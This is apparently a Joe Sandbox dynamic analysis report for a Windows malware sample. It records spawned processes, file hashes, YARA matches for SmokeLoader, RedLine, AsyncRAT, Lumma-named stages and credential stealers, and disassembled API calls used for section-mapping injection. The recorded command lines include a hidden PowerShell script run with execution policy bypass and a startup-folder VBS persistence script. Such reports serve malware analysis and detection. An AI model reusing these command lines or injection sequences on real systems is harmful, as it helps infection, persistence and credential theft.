File size:	15'872 bytes
MD5 hash:	F7D21DE5C4E81341ECCD280C11DDCC9A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 92%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	13:55:15
Start date:	24/07/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7516 -s 1536
Imagebase:	0x2e0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	13:55:19
Start date:	24/07/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff609fd0000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	13:55:37
Start date:	24/07/2024
Path:	C:\Users\user\AppData\Roaming\ftejced
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\ftejced
Imagebase:	0x7ff7df220000
File size:	186'368 bytes
MD5 hash:	779806A66CCCB6B37A02F6B30F7AECF3
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000010.00000002.1780544287.0000000002131000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000010.00000002.1780544287.0000000002131000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000010.00000002.1780411113.0000000000680000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000010.00000002.1780411113.0000000000680000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000010.00000002.1780256705.000000000050D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000010.00000002.1780382606.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 95%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	13:55:37
Start date:	24/07/2024
Path:	C:\Users\user\AppData\Local\Temp\IXDaI.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\IXDaI.exe
Imagebase:	0xee0000
File size:	15'872 bytes
MD5 hash:	F7D21DE5C4E81341ECCD280C11DDCC9A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	13:55:43
Start date:	24/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\7760095b.bat" "
Imagebase:	0xd70000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	13:55:43
Start date:	24/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	13:56:24
Start date:	24/07/2024
Path:	C:\Users\user\AppData\Local\Temp\F6D9.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\F6D9.exe
Imagebase:	0x7ff70b8c0000
File size:	988'672 bytes
MD5 hash:	2B3ECC21382E825D6FE0812A717717EB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 16%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	13:56:24
Start date:	24/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	13:56:38
Start date:	24/07/2024
Path:	C:\Users\user\AppData\Local\Temp\B552.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\B552.exe
Imagebase:	0x7ff75ee70000
File size:	11'672'576 bytes
MD5 hash:	D3785ED170CDB1F4784D3DFF3A61DAE0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Go lang
Yara matches:	Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: 0000001B.00000000.2227933484.00007FF75F3B0000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: 0000001B.00000002.2364799277.00007FF75F3B0000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: C:\Users\user\AppData\Local\Temp\B552.exe, Author: Joe Security
Antivirus matches:	Detection: 50%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	13:56:43
Start date:	24/07/2024
Path:	C:\Users\user\AppData\Local\Temp\753F.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\753F.exe
Imagebase:	0x1c0f2100000
File size:	141'944 bytes
MD5 hash:	B6A1C0998D0A7979C9EC17B8D5CF8A81
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	13:56:44
Start date:	24/07/2024
Path:	C:\Users\user\AppData\Local\Temp\753F.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\753F.exe" -HOSTRUNAS
Imagebase:	0x2ac861b0000
File size:	141'944 bytes
MD5 hash:	B6A1C0998D0A7979C9EC17B8D5CF8A81
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	13:56:49
Start date:	24/07/2024
Path:	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Imagebase:	0x320000
File size:	231'736 bytes
MD5 hash:	A64BEAB5D4516BECA4C40B25DC0C1CD8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001F.00000003.2365862383.0000000002FD6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	13:56:53
Start date:	24/07/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1"
Imagebase:	0x7ff7b2bb0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	13:56:53
Start date:	24/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	13:57:14
Start date:	24/07/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\ExtractedVenom\runvm.bat
Imagebase:	0x7ff7810c0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	13:57:14
Start date:	24/07/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\ExtractedLumma\run.bat
Imagebase:	0x7ff7810c0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	13:57:14
Start date:	24/07/2024
Path:	C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe
Wow64 process (32bit):	true
Commandline:	"vm.exe"
Imagebase:	0x400000
File size:	40'376 bytes
MD5 hash:	F1B14F71252DE9AC763DBFBFBFC8C2DC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000025.00000002.3741871434.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000025.00000002.3753331272.0000000004E40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: 00000025.00000002.3753331272.0000000004E40000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	38
Start time:	13:57:14
Start date:	24/07/2024
Path:	C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe
Wow64 process (32bit):	true
Commandline:	"lm.exe"
Imagebase:	0x400000
File size:	40'376 bytes
MD5 hash:	F1B14F71252DE9AC763DBFBFBFC8C2DC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000026.00000003.2682127976.0000000003115000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000026.00000002.2904757056.0000000003870000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000026.00000003.2731047551.000000000067D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000026.00000003.2640497026.0000000003118000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000026.00000003.2671333888.0000000003115000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000026.00000002.2881701412.0000000000060000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000026.00000003.2631693692.0000000003115000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000026.00000003.2729559730.0000000003121000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	13:57:29
Start date:	24/07/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs"
Imagebase:	0x7ff7bca40000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	13:57:30
Start date:	24/07/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\ExtractedVenom\runvm.bat" "
Imagebase:	0x7ff7810c0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	13:57:30
Start date:	24/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	13:57:30
Start date:	24/07/2024
Path:	C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe
Wow64 process (32bit):	true
Commandline:	"vm.exe"
Imagebase:	0x400000
File size:	40'376 bytes
MD5 hash:	F1B14F71252DE9AC763DBFBFBFC8C2DC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000002B.00000002.2883515347.00000000028C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: 0000002B.00000002.2883515347.00000000028C0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 0000002B.00000002.2935972956.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 0000002B.00000002.2872562883.0000000000480000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	13:57:36
Start date:	24/07/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5776 -s 1124
Imagebase:	0x2e0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	13:57:40
Start date:	24/07/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7864 -s 628
Imagebase:	0x2e0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	13:57:58
Start date:	24/07/2024
Path:	C:\Users\user\AppData\Local\Temp\F6D9.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\F6D9.exe"
Imagebase:	0x7ff70b8c0000
File size:	988'672 bytes
MD5 hash:	2B3ECC21382E825D6FE0812A717717EB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	13:57:58
Start date:	24/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	9.7%
Dynamic/Decrypted Code Coverage:	28.1%
Signature Coverage:	41.5%
Total number of Nodes:	171
Total number of Limit Nodes:	10

Executed Functions

Function 004C5044 Relevance: 33.4, APIs: 4, Strings: 15, Instructions: 171
fileprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 004C5223
WriteFile.KERNELBASE(00000000,FFF3C42A,00003E00,?,00000000), ref: 004C5252
FindCloseChangeNotification.KERNELBASE(00000000), ref: 004C5256
WinExec.KERNEL32(?,00000005), ref: 004C5262

Strings

Crea, xrefs: 004C5169
Writ, xrefs: 004C5148
WinE, xrefs: 004C5110
lstr, xrefs: 004C51A7
Kern, xrefs: 004C50F4
athA, xrefs: 004C5199
odul, xrefs: 004C522D
catA, xrefs: 004C51AF
IXDaI.exe, xrefs: 004C51FD, 004C5200
dleA, xrefs: 004C50D0
GetM, xrefs: 004C50B6
.dll, xrefs: 004C5102
GetT, xrefs: 004C5188
Clos, xrefs: 004C5129
el32, xrefs: 004C50FB

Memory Dump Source

Source File: 00000004.00000002.1462189267.00000000004C5000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C5000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c5000_7Y18r(14).jbxd

Similarity

API ID: File$ChangeCloseCreateExecFindNotificationWrite
String ID: .dll$Clos$Crea$GetM$GetT$IXDaI.exe$Kern$WinE$Writ$athA$catA$dleA$el32$lstr$odul
API String ID: 2234911746-2954602755
Opcode ID: 252e4e4688cb33ab495545a39aa9d1cede6df46384253550a8ca3c7be7bb3a91
Instruction ID: 076991852e8da1fcb0d4b364c6bdcc5c790ac0df1960d3426473c1dba4c35b1e
Opcode Fuzzy Hash: 252e4e4688cb33ab495545a39aa9d1cede6df46384253550a8ca3c7be7bb3a91
Instruction Fuzzy Hash: DA61F878D016159BCF648F94C888FAEB7B4BB44315F5982AFD405A6301CB78AAC1CB99

Function 00401496 Relevance: 10.7, APIs: 7, Instructions: 247
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645

Memory Dump Source

Source File: 00000004.00000002.1461915338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_7Y18r(14).jbxd

Similarity

API ID: Section$CreateDuplicateObjectView
String ID:
API String ID: 1652636561-0
Opcode ID: 5edb7204c22a8cfb94061bf161a88c3eca98da374ec15d8cd8ba2bf42dcd3747
Instruction ID: 8e4940cc2d5d294876689a6a874cb0cc3c399929e81e9dec1e5d288c8cd9e9dd
Opcode Fuzzy Hash: 5edb7204c22a8cfb94061bf161a88c3eca98da374ec15d8cd8ba2bf42dcd3747
Instruction Fuzzy Hash: F481B375500244BBEB209F91CC44FAB7BB8FF85704F10412AF952BA2F1E7749901CB69

Function 00401538 Relevance: 10.7, APIs: 7, Instructions: 207
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7

Memory Dump Source

Source File: 00000004.00000002.1461915338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_7Y18r(14).jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 4af5c640631db37ac51d1c1afd1ab74928840835cbc445bb96c3204467379d38
Instruction ID: 71a4d0092025beca94809e07d65936591d52f1bb8effc294688e3fcd05e54c36
Opcode Fuzzy Hash: 4af5c640631db37ac51d1c1afd1ab74928840835cbc445bb96c3204467379d38
Instruction Fuzzy Hash: E0615171900204FBEB209F95CC89FAF7BB8FF85700F10412AF912BA2E5D6759905DB65

Function 004014DE Relevance: 10.7, APIs: 7, Instructions: 204
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645

Memory Dump Source

Source File: 00000004.00000002.1461915338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_7Y18r(14).jbxd

Similarity

API ID: Section$CreateDuplicateObjectView
String ID:
API String ID: 1652636561-0
Opcode ID: c3f6308678fe624b1287adcb7156a2cf5c07ee8b7810a15753646c5694e98bc6
Instruction ID: 6a824664258ffec6fdf95c516407446232c8a84219ad61b9fd4b8efeb52f3576
Opcode Fuzzy Hash: c3f6308678fe624b1287adcb7156a2cf5c07ee8b7810a15753646c5694e98bc6
Instruction Fuzzy Hash: 9B615C75900245BFEB219F91CC88FEBBBB8FF85710F10016AF951BA2A5E7749901CB24

Function 00401543 Relevance: 10.7, APIs: 7, Instructions: 173
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7

Memory Dump Source

Source File: 00000004.00000002.1461915338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_7Y18r(14).jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: f4faf4f0efc4cc5c307795d20c298965336779ff7452863f8b2b81be2522acaa
Instruction ID: 1fc6fb52bb36dddf8f971a96ecfe927bdbae9887f6286775c14151e9c1d92244
Opcode Fuzzy Hash: f4faf4f0efc4cc5c307795d20c298965336779ff7452863f8b2b81be2522acaa
Instruction Fuzzy Hash: 13512B71900245BBEB209F91CC88FAF7BB8EF85B00F14416AF912BA2E5D6749945CB64

Function 00401565 Relevance: 10.7, APIs: 7, Instructions: 165
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7

Memory Dump Source

Source File: 00000004.00000002.1461915338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_7Y18r(14).jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 40d7219ce39e026dd98d18ec02294656054e4da488103e740ba1602fb3a5db7c
Instruction ID: d88667ffe02cbbb2798d41d5ad0cf6527765788d972b82ac88077c7d238bff09
Opcode Fuzzy Hash: 40d7219ce39e026dd98d18ec02294656054e4da488103e740ba1602fb3a5db7c
Instruction Fuzzy Hash: 54511A71900205BFEF209F91CC89FAFBBB8FF85B10F104259F911AA2A5D7759941CB64

Function 00401579 Relevance: 10.7, APIs: 7, Instructions: 163
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7

Memory Dump Source

Source File: 00000004.00000002.1461915338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_7Y18r(14).jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 44bf211d5ecd49b3cfb3996dc98baa0f9fc545abe5e070ef87effc0df1f686f8
Instruction ID: 7169477154cf1621f4f222e223ad54e678f31395e99d0ffd613e12cb64d905d3
Opcode Fuzzy Hash: 44bf211d5ecd49b3cfb3996dc98baa0f9fc545abe5e070ef87effc0df1f686f8
Instruction Fuzzy Hash: 2B511A75900245BBEF209F91CC88FEF7BB8FF85B10F104119F911BA2A5D6759941CB64

Function 0040157C Relevance: 10.7, APIs: 7, Instructions: 160
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7

Memory Dump Source

Source File: 00000004.00000002.1461915338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_7Y18r(14).jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
